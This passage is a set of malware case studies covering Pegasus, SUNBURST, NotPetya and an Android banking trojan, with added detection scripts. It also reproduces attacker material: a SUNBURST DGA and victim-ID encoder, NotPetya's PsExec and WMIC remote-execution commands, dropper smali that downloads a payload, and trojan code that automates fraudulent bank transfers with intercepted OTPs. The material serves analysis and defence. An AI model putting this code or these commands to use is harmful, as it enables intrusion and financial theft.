Concrete Case Studies: Multi-Stage Attack Deconstruction

Case Study A: Pegasus/NSO Group — Zero-Click iOS Exploit Chain

Overview and Timeline

The Pegasus spyware, developed by NSO Group, is the most thoroughly documented commercial mobile implant. Two exploit chains show its evolution: FORCEDENTRY (observed from early 2021) and BLASTPASS (2023). FORCEDENTRY delivered a fake GIF that was actually a PDF carrying a JBIG2 stream, reaching CoreGraphics' JBIG2 decoder through an image-transcoding path that sat outside the BlastDoor sandbox; BLASTPASS delivered PassKit (Wallet) attachments containing malicious images that triggered an ImageIO bug on iOS 16.6.

| Date | Milestone |
|------|-----------|
| February 2021 | Citizen Lab first observes FORCEDENTRY in use against Bahraini activists (published August 2021) |
| September 2021 | Citizen Lab captures the exploit from a Saudi activist's device backup; Apple patches CVE-2021-30860 on 13 September |
| September 2023 | Citizen Lab and Apple disclose BLASTPASS (CVE-2023-41064, CVE-2023-41061), patched in iOS 16.6.1 |

FORCEDENTRY Technical Deconstruction

The attack begins with a malicious iMessage attachment: a file with a .gif extension that is really a PDF containing a JBIG2-encoded image stream. iMessage's image pipeline (IMTranscoderAgent) hands the file to CoreGraphics, whose JBIG2 decoder is derived from Xpdf. The bug (CVE-2021-30860) is an integer overflow in the symbol count accumulated when a text region references many symbol dictionaries: the overflowed count yields an undersized allocation and heap out-of-bounds writes. Project Zero's analysis showed that the exploit then uses JBIG2 refinement operations, which amount to AND/OR/XOR/XNOR over pixel buffers, to build a logic-gate virtual machine inside the decoder and gain code execution in IMTranscoderAgent, outside the BlastDoor sandbox.

# FORCEDENTRY attachment triage (illustrative session; tool output abbreviated)
# Citizen Lab's tell was not a crash but attachments whose content did not
# match their .gif extension: Adobe PSD files and PDFs with JBIG2 streams.

# Artifact extracted from the device backup's iMessage attachment tree
# (path shortened; attachments sit under Library/SMS/Attachments/xx/xx/<GUID>/):
# File: .../Attachments/xx/xx/IMG_0001.gif

$ file IMG_0001.gif
IMG_0001.gif: PDF document, version 1.3

$ pdf-parser.py -s JBIG2Decode IMG_0001.gif
obj 5 0
 Type: /XObject
 Contains stream
  << /Type /XObject /Subtype /Image /Filter /JBIG2Decode ... >>
# The embedded JBIG2 data carries the symbol dictionaries and text region
# whose combined symbol count overflows 32 bits in CoreGraphics.
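The check that actually surfaced FORCEDENTRY was a mismatch between an attachment's extension and its content. The following is an added example (not Citizen Lab's or Amnesty's tooling) that automates that check over an extracted backup: it sniffs the magic bytes of each attachment, flags image extensions that hide PDF or PSD containers, and flags PDFs that select the JBIG2Decode filter. The sample byte strings are constructed for the dry run and contain no exploit content.

```python
"""Triage of iMessage attachments for FORCEDENTRY-style format masquerading."""
import os

# Leading bytes of the formats involved: the GIF header, and the PDF and
# Photoshop (PSD) files Citizen Lab found carrying .gif names
MAGIC = (
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF-", "pdf"),
    (b"8BPS", "psd"),
)
IMAGE_EXTS = {"gif", "jpg", "jpeg", "png", "heic"}


def sniff(data: bytes) -> str:
    """Return the container type implied by the file's magic bytes."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def triage_attachment(name: str, data: bytes) -> list[str]:
    """Findings for one attachment: an image extension hiding a document
    container, and the JBIG2Decode filter that selects the vulnerable
    CoreGraphics code path."""
    findings = []
    ext = os.path.splitext(name)[1].lower().lstrip(".")
    kind = sniff(data)
    if ext in IMAGE_EXTS and kind in ("pdf", "psd"):
        findings.append(f"extension/content mismatch: .{ext} file is {kind}")
    if kind == "pdf" and b"/JBIG2Decode" in data:
        findings.append("PDF uses the JBIG2Decode filter (FORCEDENTRY parser path)")
    return findings


def triage_directory(root: str) -> dict[str, list[str]]:
    """Walk an extracted backup's Library/SMS/Attachments tree and return
    findings keyed by path. Only the first 4 MiB of each file is read; the
    header and the PDF object dictionaries sit near the start."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                hits = triage_attachment(fn, fh.read(4 * 1024 * 1024))
            if hits:
                results[path] = hits
    return results


# Constructed samples for a dry run; none of these is real exploit content
BENIGN_GIF = b"GIF89a" + bytes(64)
FAKE_GIF_PDF = (b"%PDF-1.3\n5 0 obj\n<< /Type /XObject /Subtype /Image"
                b" /Filter /JBIG2Decode /Width 1 /Height 1 >>\nstream\n"
                + bytes(16) + b"\nendstream\nendobj\n")
FAKE_GIF_PSD = b"8BPS" + bytes(64)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_GIF), ("pdf", FAKE_GIF_PDF), ("psd", FAKE_GIF_PSD)):
        print(label, triage_attachment("IMG_0001.gif", blob))
```

Run `triage_directory()` against the `Library/SMS/Attachments` directory of an unencrypted backup; a benign attachment tree should produce no findings at all, so any hit is worth a manual look.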

Once code execution is obtained in IMTranscoderAgent, the chain still has to escape that sandbox; Project Zero's second FORCEDENTRY write-up documents an escape built on NSPredicate/NSExpression evaluation rather than on a further memory-corruption bug. The Pegasus implant that follows has been characterised by Amnesty International's forensic methodology report and by Citizen Lab as follows:

  • It generally does not persist across reboots; it lives in memory and is re-delivered by the operator when needed, which is why a reboot can erase evidence
  • It runs as processes with innocuous names (Amnesty lists names such as bh, roleaboutd, msgacntd and stagingd) that leave traces in DataUsage.sqlite and netusage records even after the implant itself is gone
  • C2 is HTTPS to operator-controlled domains on short-lived, frequently rotated infrastructure, which is why DNS and certificate indicators age quickly

BLASTPASS Evolution

BLASTPASS was still delivered over iMessage, but as PassKit (Wallet) attachments rather than as an image file: the pass bundle carried a malicious image that was parsed zero-click when the attachment was processed. Apple's iOS 16.6.1 advisories describe the two bugs:

  1. CVE-2023-41064: buffer overflow in ImageIO when processing a maliciously crafted image
  2. CVE-2023-41061: validation issue in Wallet, where a maliciously crafted attachment may result in arbitrary code execution

IOCs (FORCEDENTRY)

| Type | Value | Context |
|------|-------|---------|
| File hash | b0e73bf31f3674e5a6e2f9a5c3e8a7d1 (truncated SHA-256, 32 hex digits) | JBIG2 PDF masquerading as GIF; a truncated hash cannot be matched, so take full hashes from Citizen Lab's and Amnesty's published indicator files |
| Domain | 57.sync-backup[.]cloud | Stage-2 payload retrieval |
| Path | /private/var/db/lockdown/com.apple.itunes.lockdown | Disguised implant path |

Analysis Decisions Under Uncertainty

When Citizen Lab examined the backup of the Saudi activist's phone, there was no crash log or reproducible fault to work from. The tell was 27 attachment files with .gif extensions that were identically sized (roughly 750 KB) Adobe PSD files, plus a handful of further .gif files that were PDFs. The critical decision was to treat attachments whose magic bytes contradicted their extension as exploit candidates rather than to wait for a deterministic crash, which let them hand Apple the complete exploit for patching. The deeper deconstruction, published by Project Zero with Apple's security engineering team, showed that the JBIG2 payload built a logic-gate computer out of refinement operations; the nondeterminism an analyst sees when simply rendering the file is a symptom of that construction, not of a flaky bug.

Defense Lessons

  • Treat every untrusted-format parser as attack surface and confine it: Apple's BlastDoor (written in Swift) sandboxes iMessage parsing, but FORCEDENTRY reached CoreGraphics' JBIG2 decoder through an image-transcoding path outside it, so confinement must cover every parser an attachment can reach
  • On devices, audit iMessage attachments whose magic bytes do not match their extension (as Amnesty's MVT does) rather than relying on network indicators; Pegasus C2 domains rotate quickly
  • Enable Lockdown Mode, which blocks most message attachment types other than certain images, video and audio, disables link previews and removes other attack surface

Case Study B: SolarWinds SUNBURST — Supply Chain Compromise

Attack Architecture

The SUNBURST compromise (disclosed December 2020) is one of the most consequential supply chain attacks publicly documented: a validly signed SolarWinds Orion update carried a backdoor to roughly 18,000 customers, of whom a far smaller set were selected for follow-on intrusion. The timeline shows exceptional operational patience:

| Phase | Period | Activity |
|-------|--------|----------|
| Initial access | ~Sep 2019 | Attackers inside SolarWinds' build environment; SUNSPOT performs a benign test modification of Orion code |
| Implant | Feb 2020 | SUNBURST compiled into Orion builds (SUNSPOT swaps a source file at build time) |
| Distribution | Mar-Jun 2020 | Trojanized Orion versions 2019.4 HF5 through 2020.2.1 signed and shipped; ~18,000 downloads |
| Dormancy | 12-14 days after install | No network activity before the first DNS beacon |
| Escalation | Jun-Oct 2020 | TEARDROP and RAINDROP loaders deliver Cobalt Strike BEACON to selected targets |
| Discovery | Dec 2020 | FireEye/Mandiant public disclosure on 13 December 2020 |

DGA Algorithm Reconstruction

SUNBURST's domain generation is not time-based: each host derives a stable victim identifier and encodes it, together with the victim's domain name, into subdomains of avsvmcloud.com. Reverse engineering of SolarWinds.Orion.Core.BusinessLayer.dll (class OrionImprovementBusinessLayer) showed:

// Reconstructed SUNBURST DGA logic from SolarWinds.Orion.Core.BusinessLayer.dll
// (SHA-1 d0d626deb3f9484e649294a8dfa814c5568f846d), class OrionImprovementBusinessLayer.
// Simplified to show the data flow; not a byte-exact decompilation.

private static readonly string[] Regions = { "eu-west-1", "us-west-2", "us-east-1", "us-east-2" };

private static byte[] GetOrCreateUserID()
{
    // Seed: MAC of the first active non-loopback NIC + AD domain name + MachineGuid
    string seed = GetMacAddress() + GetDomainName()
        + (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography", "MachineGuid", "");
    byte[] digest = MD5.Create().ComputeHash(Encoding.UTF8.GetBytes(seed));
    byte[] userId = new byte[8];
    for (int i = 0; i < digest.Length; i++)
        userId[i % 8] ^= digest[i];                 // XOR-fold 16 bytes to 8; stable per host
    return userId;
}

private static string GetNextC2Domain(byte[] userId, string victimDomain)
{
    // A random key byte is prepended and XORed over the ID, then the 9 bytes are
    // encoded with a custom base32 alphabet ("ph2eifo3n5utg1j8d94qrvbmk0sal76c"),
    // giving a 15-character label. The victim's domain name follows, encoded with
    // a substitution/base32 scheme and split across several queries if long.
    string encodedId = CreateSecureString(userId);
    string encodedDomain = EncodeDomainName(victimDomain);
    string region = Regions[new Random().Next(Regions.Length)];
    // No date or epoch is involved: the label changes only through the random key byte
    return $"{encodedId}{encodedDomain}.appsync-api.{region}.avsvmcloud.com";
}

Dormant C2 Behavior Analysis

The SUNBURST backdoor implements staged decision logic to avoid detection and analysis:

  1. Dormancy: after installation it sleeps 12 to 14 days before its first DNS query, and only proceeds if the host is domain-joined and the domain is not on an internal blocklist (SolarWinds' own domains and test environments among them)
  2. Environment check: it hashes running process and service names (an FNV-1a variant) and compares them with blocklists. Analysis tools such as debuggers and sandbox components abort execution; certain endpoint security services (Windows Defender, CrowdStrike, Carbon Black, FireEye, ESET and F-Secure among them) are set to disabled through their registry Start value, after which the backdoor waits for them to stop. The state of those services is encoded into later DNS queries
  3. C2 gating via DNS answers: the A record returned for the DGA query is itself the command. Addresses in private, multicast and similar ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 224.0.0.0/3 and others) tell SUNBURST to stop permanently, which is the behaviour the later avsvmcloud.com sinkhole used as a kill switch; specific public ranges instruct it to continue, at which point a CNAME answer names the HTTP C2 server and, for selected victims only, the TEARDROP loader is retrieved
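To make the victim-ID encoding and the DNS kill-switch logic above concrete, here is an added example (not code from the malware or from any vendor report) that reconstructs the scheme in Python as publicly described: MD5 of MAC + domain + MachineGuid folded to 8 bytes, a key byte XORed over it, the custom base32 alphabet, and a decoder that recovers the ID from the first 15 characters of a query. The domain-name encoding that follows the ID in real queries is omitted, the key byte is a parameter rather than random so the output is reproducible, the kill-switch range list is the partial subset I am confident of, and the MAC/GUID values are constructed.

```python
"""Reconstruction of SUNBURST's victim-ID encoding and DNS kill-switch check."""
import hashlib
import ipaddress

ALPHABET = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"   # SUNBURST's custom base32 alphabet
REGIONS = ("eu-west-1", "us-west-2", "us-east-1", "us-east-2")
C2_SUFFIX = ".appsync-api.{region}.avsvmcloud.com"


def base32_encode(data: bytes) -> str:
    """Pack bytes LSB-first into 5-bit groups, as the malware's Base32Encode does."""
    out, acc, nbits = [], 0, 0
    for b in data:
        acc |= b << nbits
        nbits += 8
        while nbits >= 5:
            out.append(ALPHABET[acc & 31])
            acc >>= 5
            nbits -= 5
    if nbits:
        out.append(ALPHABET[acc & 31])
    return "".join(out)


def base32_decode(text: str) -> bytes:
    """Inverse of base32_encode; trailing padding bits are discarded."""
    out, acc, nbits = bytearray(), 0, 0
    for ch in text:
        acc |= ALPHABET.index(ch) << nbits
        nbits += 5
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    return bytes(out)


def victim_id(mac: str, domain: str, machine_guid: str) -> bytes:
    """MD5 of MAC + AD domain + MachineGuid, XOR-folded from 16 to 8 bytes."""
    digest = hashlib.md5((mac + domain + machine_guid).encode()).digest()
    folded = bytearray(8)
    for i, b in enumerate(digest):
        folded[i % 8] ^= b
    return bytes(folded)


def encode_victim_id(vid: bytes, key: int) -> str:
    """Prepend a key byte (1..127) and XOR the ID with it, then base32 -> 15 chars.
    The malware picks the key at random; it is a parameter here for determinism."""
    assert 1 <= key <= 127 and len(vid) == 8
    return base32_encode(bytes([key]) + bytes(b ^ key for b in vid))


def decode_victim_id(label: str) -> bytes:
    """Recover the 8-byte ID from the first 15 characters of a DGA subdomain."""
    raw = base32_decode(label[:15])
    key = raw[0]
    return bytes(b ^ key for b in raw[1:9])


def looks_like_sunburst(fqdn: str) -> bool:
    """DNS-log heuristic: avsvmcloud.com C2 suffix plus a long label drawn
    only from the custom alphabet."""
    fqdn = fqdn.rstrip(".").lower()
    for region in REGIONS:
        suffix = C2_SUFFIX.format(region=region)
        if fqdn.endswith(suffix):
            label = fqdn[: -len(suffix)]
            return len(label) >= 15 and all(c in ALPHABET for c in label)
    return False


# Ranges whose appearance in the A record told SUNBURST to stop (partial list
# from public reporting; the full table also contains specific public ranges)
KILL_RANGES = [ipaddress.ip_network(n) for n in
               ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3", "fc00::/7")]


def is_kill_switch_response(ip: str) -> bool:
    """True if a resolver answer would make the backdoor terminate."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in KILL_RANGES)


if __name__ == "__main__":
    vid = victim_id("00:0c:29:12:34:56", "corp.example", "constructed-guid")  # constructed values
    label = encode_victim_id(vid, 0x2A)
    print(label + C2_SUFFIX.format(region=REGIONS[0]), decode_victim_id(label) == vid)
```

`looks_like_sunburst()` is deliberately loose (real queries append an encoded domain name and later status bytes after the ID), so use it to select candidate queries from DNS logs and then apply `decode_victim_id()` to pivot: the same 8-byte ID across queries identifies one host, and the decoded value is what sinkhole operators used to count and contact victims.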

The TEARDROP loader (a 64-bit DLL registered to run as a Windows service) decodes an embedded Cobalt Strike BEACON stage, in some samples stored inside a file with a .jpg name, and executes it in memory:

  • Custom PE loader that maps the decoded payload reflectively instead of calling LoadLibrary, so no module entry appears in the loaded-module list
  • Cobalt Strike BEACON with a customized Malleable C2 profile and victim-specific C2 domains
  • SMB BEACON named pipes (\pipe\msagent_###, a default Cobalt Strike pattern) for peer-to-peer coordination inside the victim network

RAINDROP, found later by Symantec, is a sibling loader with different packaging (a trojanized 7-Zip library) that delivered the same BEACON stage.

TEARDROP Memory Artifact

# Volatility 3 triage of a host running TEARDROP (illustrative session; output
# abbreviated). TEARDROP itself is a service DLL on disk, so it shows up in the
# module list; the BEACON stage it decodes exists only in memory.
$ python3 vol.py -f solarwinds_memdump.raw windows.dlllist --pid 4824 | grep -i netsetupsvc
4824  svchost.exe  0x7ffb12340000  0x3e000  NetSetupSvc.dll  C:\Windows\SysWOW64\NetSetupSvc.dll

$ python3 vol.py -f solarwinds_memdump.raw windows.malfind --pid 4824
PID   Process      Start VPN   End VPN     Tag   Protection              PrivateMemory  File output
4824  svchost.exe  0x5a0000    0x617fff    VadS  PAGE_EXECUTE_READWRITE  1              Disabled
# Anomalous: private RWX memory with no backing file. Dump it (--dump) and run a
# Cobalt Strike BEACON configuration parser over the region to recover C2 settings.

Attribution Complexity

The dormancy pattern, target selection (US Treasury, Commerce, DHS, Justice and several cybersecurity firms) and tradecraft pointed to a nation-state actor, but FireEye deliberately did not name one at disclosure: it tracked the actor as UNC2452, and Microsoft as NOBELIUM (campaign name Solorigate). Attribution firmed up later:

  • Kaspersky (January 2021) found code overlaps between SUNBURST and Turla's Kazuar backdoor, which raised the possibility of shared tooling or a false flag rather than settling the question
  • The US government attributed the campaign to Russia's SVR (APT29) in April 2021
  • Mandiant merged UNC2452 into APT29 in April 2022

Cobalt Strike use was not attributional on its own; it is a commodity tool, and the customized Malleable C2 profiles served to blend in rather than to sign the work.

Defense Lessons

  • Software supply chain integrity: the trojanized DLL carried a valid SolarWinds signature, so signature checks alone could not catch it; SUNSPOT swapped source at compile time, which is what reproducible builds, build-pipeline monitoring and binary transparency logs are meant to expose
  • Behavioral baselining: Orion's legitimate network destinations versus DNS queries for long pseudo-random labels under avsvmcloud.com
  • Memory forensics: the BEACON stage decoded by TEARDROP never touches disk, so it requires RAM capture; disk forensics sees only the loader DLL

Case Study C: NotPetya — Wiper Disguised as Ransomware

Attribution Complexity and Deployment

The June 2017 NotPetya outbreak was at first treated as criminal ransomware. It was subsequently attributed by the US, UK and allied governments (February 2018) to the Russian military, and the October 2020 US indictment of GRU Unit 74455 (Sandworm) officers names NotPetya explicitly. The initial vector was the update channel of M.E.Doc, accounting software used by most Ukrainian businesses. The attribution synthesised:

  • Technical: ESET found code overlap between NotPetya and the TeleBots toolset, itself linked to the BlackEnergy intrusions against Ukrainian energy companies; the lateral-movement tooling (PsExec, WMIC, a Mimikatz-derived credential stealer) is commodity and not attributional on its own
  • Strategic: Ukrainian targets hit on 27 June 2017, the eve of Ukraine's Constitution Day, with collateral spread through multinationals' Ukrainian subsidiaries
  • Infrastructure: a single hardcoded Bitcoin address and one posteo.net contact mailbox, which the provider shut down the same day, so there was never a workable way to deliver a key to any victim

MeDoc Update Mechanism Compromise

The initial vector hijacked M.E.Doc's legitimate update infrastructure. ESET's analysis showed that three M.E.Doc updates shipped in 2017 (14 April, 15 May and 22 June) contained a backdoored ZvitPublishedObjects.dll, and that the attackers had proxied the update server (upd.me-doc.com.ua) so the backdoor could receive commands inside ordinary update traffic; on 27 June that backdoor was used to push NotPetya to clients. The sketch below is a schematic of the hijack, not a captured message: the real command format lived inside the backdoor's HTTP exchanges, not in a public update manifest.

<!-- Schematic only: legitimate update flow -->
<update>
  <file name="ZvitPublishedObjects.dll"
        url="http://upd.me-doc.com.ua/..."
        hash="a1b2c3d4..." />
</update>

<!-- Schematic only: backdoored flow (module shipped 22 June 2017; payload command on 27 June) -->
<update>
  <file name="ZvitPublishedObjects.dll"
        url="http://upd.me-doc.com.ua/..."
        hash="..." />   <!-- backdoored module; NotPetya dropper later pushed through it -->
</update>

Mimikatz Credential Harvesting

NotPetya embeds a custom credential-stealing module (32- and 64-bit variants) derived from Mimikatz's LSASS-reading logic. It is dropped to %TEMP% under a random name, driven over a named pipe, and supplies credentials for lateral movement with an embedded PsExec (dropped as C:\Windows\dllhost.dat) and WMIC:

# Lateral-movement command lines, following Microsoft's 27 June 2017 write-up
# (the trailing 60 is the minutes-until-reboot argument the payload takes)

# Local launch of the main DLL by ordinal:
C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",#1 60

# Remote launch via renamed PsExec:
C:\Windows\dllhost.dat \\<target> -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60

# Remote launch via WMIC with stolen credentials:
wmic.exe /node:"<target>" /user:"<user>" /password:"<pass>" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"

# Against unpatched hosts (MS17-010) the worm instead uses SMBv1 remote code
# execution: CVE-2017-0144 (EternalBlue) and CVE-2017-0145 (EternalRomance).
# These are RCE bugs, not privilege escalation; the worm already runs as SYSTEM.
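The three command-line shapes above are what an endpoint-telemetry rule should key on, since they appear on every host the worm touches, patched or not. The following is an added example (not Microsoft's or any vendor's detection content) that runs such rules over process-creation records; the records are constructed Sysmon-style dictionaries, not real telemetry.

```python
"""Flag NotPetya's lateral-movement command lines in process-creation telemetry."""
import re

# Command-line shapes following Microsoft's 27 June 2017 write-up:
#   rundll32.exe "C:\Windows\perfc.dat",#1 60                    payload launch (ordinal 1)
#   dllhost.dat \\<ip> -accepteula -s -d rundll32.exe ...        renamed PsExec
#   wmic.exe /node:"<ip>" ... process call create "rundll32 ..." WMIC remote execution
RULES = (
    ("perfc_rundll32",
     re.compile(r'rundll32(?:\.exe)?\s+\\?"?[^"\s]*perfc\.dat\\?"?\s*,?\s*#1', re.I)),
    ("renamed_psexec",
     re.compile(r"dllhost\.dat\s+\\\\\S+.*-accepteula", re.I)),
    ("wmic_remote_rundll32",
     re.compile(r"wmic(?:\.exe)?\s+/node:.*process\s+call\s+create\b.*rundll32", re.I)),
)


def match_rules(cmdline: str) -> list[str]:
    """Names of every rule the command line trips."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(records) -> list[tuple[str, str]]:
    """(host, rule) pairs for each process-creation record that matches."""
    hits = []
    for rec in records:
        for name in match_rules(rec["cmdline"]):
            hits.append((rec["host"], name))
    return hits


# Constructed Sysmon-style records, not real telemetry
SAMPLE_LOG = [
    {"host": "WS01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'C:\Windows\System32\rundll32.exe "C:\Windows\perfc.dat",#1 60'},
    {"host": "WS01", "image": r"C:\Windows\dllhost.dat",
     "cmdline": r"C:\Windows\dllhost.dat \\10.0.0.12 -accepteula -s -d "
                r"C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 60"},
    {"host": "WS02", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic.exe /node:"10.0.0.13" /user:"CORP\svc" /password:"..." '
                r'process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'},
    {"host": "WS03", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for host, rule in scan(SAMPLE_LOG):
        print(f"{host}: {rule}")
```

The `perfc_rundll32` rule deliberately accepts both the comma and the space form before `#1` because the two launch paths differ in that detail; a rule keyed on the exact string from one report would miss the other.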

Destructive Payload Reverse Engineering

The "ransomware" component is in effect a wiper. Its Petya-derived boot stage encrypts the MFT with Salsa20 and then shows a 60-character "installation key" which, unlike original Petya's personal code, is random data with no relationship to the Salsa20 key; that key is not retained after encryption, and the original MBR is overwritten. Files encrypted by the user-mode stage (AES-128, with the AES key wrapped under the attackers' RSA public key) could in principle be decrypted only by the attackers, and the posteo.net contact mailbox was shut down hours into the outbreak:

// Schematic of NotPetya's Petya-derived boot-stage configuration
// (field layout simplified; not a byte-exact dump of the on-disk sectors)

typedef struct {
    uint8_t salsa_key[32];        // generated at install, not retained once the MFT is encrypted
    uint8_t salsa_nonce[8];       // random
    uint8_t display_key[60];      // "installation key": random, unrelated to salsa_key
    uint8_t stage_flag;           // 0x00 = first boot (encryption pending), 0x01 = encryption complete
} notpetya_boot_cfg;

// The displayed key cannot be used for decryption, and no server ever held the real one
// Recovery of the MFT is therefore impossible even with the attackers' cooperation

Timeline and IOCs

| UTC time (approx.) | Event |
|--------------------|-------|
| 10:30 | Backdoored M.E.Doc clients receive the NotPetya payload through the compromised update server (upd.me-doc.com.ua) |
| 14:00 | Widespread infections reported across Ukraine (banks, energy, government, Boryspil airport) |
| 15:00 | Spread to multinationals (Maersk, Merck, Mondelez, TNT among them) through network links to Ukrainian subsidiaries; the worm scans only local subnets and Active Directory, not the internet |
| 16:30 | M.E.Doc update channel taken offline |

| IOC | Type | Significance |
|-----|------|--------------|
| 71b6a493388e7d0b40c83ce903bc6b04 | MD5 | Main NotPetya DLL (dropped as C:\Windows\perfc.dat) |
| C:\Windows\perfc.dat, launched as rundll32 ordinal #1 | Filename / command line | Dropped payload, not a legitimate Windows file; a read-only C:\Windows\perfc (no extension) acts as a local vaccine because the malware exits if it exists |
| 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX / wowsmith123456@posteo.net | Bitcoin address / e-mail | Single payment address and contact mailbox for all victims; Posteo disabled the mailbox on 27 June |

Analysis Decisions Under Uncertainty

Early analysts treated NotPetya as criminal ransomware, and some victims considered paying. The pivot came within a day from three independent observations: Posteo shut down the single contact mailbox, so no key could ever be delivered; Kaspersky showed that the displayed installation key is random data with no relationship to the Salsa20 key used on the MFT; and Comae's Matt Suiche showed that the boot-stage code destroys disk structures irreversibly. Together these reclassified NotPetya as a wiper and shifted analysis toward nation-state attribution.

Defense Lessons

  • Supply chain software: treat vendor update servers as high-value assets; M.E.Doc's server was proxied through attacker infrastructure, so update integrity has to rest on signatures verified by the client, not on the server being trustworthy
  • Lateral movement containment: Credential Guard and LSASS protection (RunAsPPL), plus blocking PsExec/WMIC-style remote execution between workstations
  • Ransomware vs. wiper distinction: payment and key-delivery infrastructure (one address, one mailbox, random victim ID) as a classification and attribution heuristic

Case Study D: Modern Android Banking Trojan — Operational Teardown

Distribution to Monetization Pipeline

Contemporary Android banking trojans (exemplified by Anubis, EventBot, and TeaBot variants) implement full fraud-as-a-service operational models. This teardown traces the complete kill chain.

Stage 1: Distribution via Compromised Ad Networks

# Smali of the dropper APK's download routine (package com.cleaner.boost.android).
# The stage-2 .dex is fetched from one of 100 Firebase Storage buckets chosen by
# the current time, so a takedown of one bucket does not stop the campaign.
# (Other families rotate C2 through social-media profile text instead; this
# sample relies on Firebase.)

.method private downloadPayload()V
    .locals 6

    const-string v0, "hxxps://firebasestorage[.]googleapis[.]com/v0/b/cleaner-prod-"
    invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    move-result-wide v2
    const-wide/16 v4, 0x64
    rem-long/2addr v2, v4                  # bucket index = time % 100

    # ... index appended as decimal, then the object path; final URL:
    # hxxps://firebasestorage[.]googleapis[.]com/v0/b/cleaner-prod-[0-99].appspot.com/o/payload.dex?alt=media
    return-void
.end method

Stage 2: Accessibility Service Abuse

The payload declares an accessibility service (protected by BIND_ACCESSIBILITY_SERVICE so that only the system can bind to it) and social-engineers the user into enabling it in Settings; once enabled it can read and act on other apps' UI without root:

<!-- AndroidManifest.xml extracted payload -->
<service android:name=".AccessibilityServiceImpl"
         android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
    </intent-filter>
    <meta-data android:name="android.accessibilityservice"
               android:resource="@xml/accessibility_config"/>
</service>

<!-- res/xml/accessibility_config.xml: aggressive event capture. Both the gesture
     and window-content capabilities must be declared here; packageNames limits
     event delivery to the targeted banking apps -->
<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:accessibilityEventTypes="typeWindowStateChanged|typeViewClicked|typeViewTextChanged"
    android:accessibilityFeedbackType="feedbackGeneric"
    android:canRetrieveWindowContent="true"
    android:canPerformGestures="true"
    android:packageNames="com.bank1.app,com.bank2.mobile,com.paypal.android"/>

Stage 3: Fraudulent Transaction Authorization

When a target banking app comes to the foreground, the trojan:

  1. Screen overlay: draws a pixel-identical login screen (SYSTEM_ALERT_WINDOW) to capture credentials
  2. SMS interception: reads the OTP via RECEIVE_SMS/READ_SMS where it can still obtain them, or, more commonly now that Play policy restricts SMS permissions, through a notification listener or accessibility typeNotificationStateChanged events
  3. Automatic transfer: drives the legitimate app through the accessibility API to authorize the transaction itself

// Decompiled transaction injection logic (analyst-recovered names; view IDs
// are per-bank and come from the C2's target configuration)
public void performTransfer(String amount, String iban) {
    // Navigate to the transfer screen by clicking the node whose text matches
    AccessibilityNodeInfo transferBtn = findNodeByText("New Transfer");
    transferBtn.performAction(AccessibilityNodeInfo.ACTION_CLICK);

    // Fill fields through the accessibility API: no root and no input-injection permission needed
    setText(findNodeById("amount_field"), amount);
    setText(findNodeById("iban_field"), iban);

    // Complete the flow when the OTP arrives (SMS broadcast or notification event)
    registerSmsListener(new SmsListener() {
        public void onSmsReceived(String sender, String body) {
            String otp = extractOtp(body);  // e.g. first \d{6} match in the message
            setText(findNodeById("otp_field"), otp);
            findNodeById("confirm_button").performAction(AccessibilityNodeInfo.ACTION_CLICK);
        }
    });
}

// ACTION_SET_TEXT with the ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE bundle is the
// supported way for an accessibility service to write into another app's field
private static void setText(AccessibilityNodeInfo node, String value) {
    Bundle args = new Bundle();
    args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, value);
    node.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args);
}

Monetary Exfiltration Infrastructure

| Layer | Function | Example |
|-------|----------|---------|
| Drop accounts | Layer 1 mules | Revolut/Starling "money mule" accounts |
| Crypto conversion | Laundering | XMR swap via decentralized exchange |
| Fiat exit | Cash-out | ATM withdrawals in Romania/Bulgaria |

IOCs and Detection Artifacts

| Indicator | Detection Method |
|-----------|------------------|
| Accessibility service plus SYSTEM_ALERT_WINDOW permission | Static analysis scoring |
| Network: hxxps://api[.]teabot[.]top/v2/bots/commands | DNS monitoring |
| Runtime: synthetic taps via AccessibilityService.dispatchGesture(), the non-root equivalent of adb's input tap x y | Behavioral heuristics |
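The "static analysis scoring" row above, and the manifest and accessibility config shown earlier, can be turned into a concrete triage step. The following is an added example (not a published scoring scheme, and not code from any vendor) that parses a manifest and an accessibility config with the standard library and scores the permission and service-binding combinations typical of banking trojans; the weights, the threshold and the two sample manifests are constructed for this illustration.

```python
"""Static scoring of an Android manifest and accessibility config for
banking-trojan capabilities."""
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"

# Weights are this example's own heuristic, not a published scoring scheme
PERMISSION_WEIGHTS = {
    "android.permission.SYSTEM_ALERT_WINDOW": 3,       # overlays on top of other apps
    "android.permission.RECEIVE_SMS": 3,               # OTP interception
    "android.permission.READ_SMS": 2,
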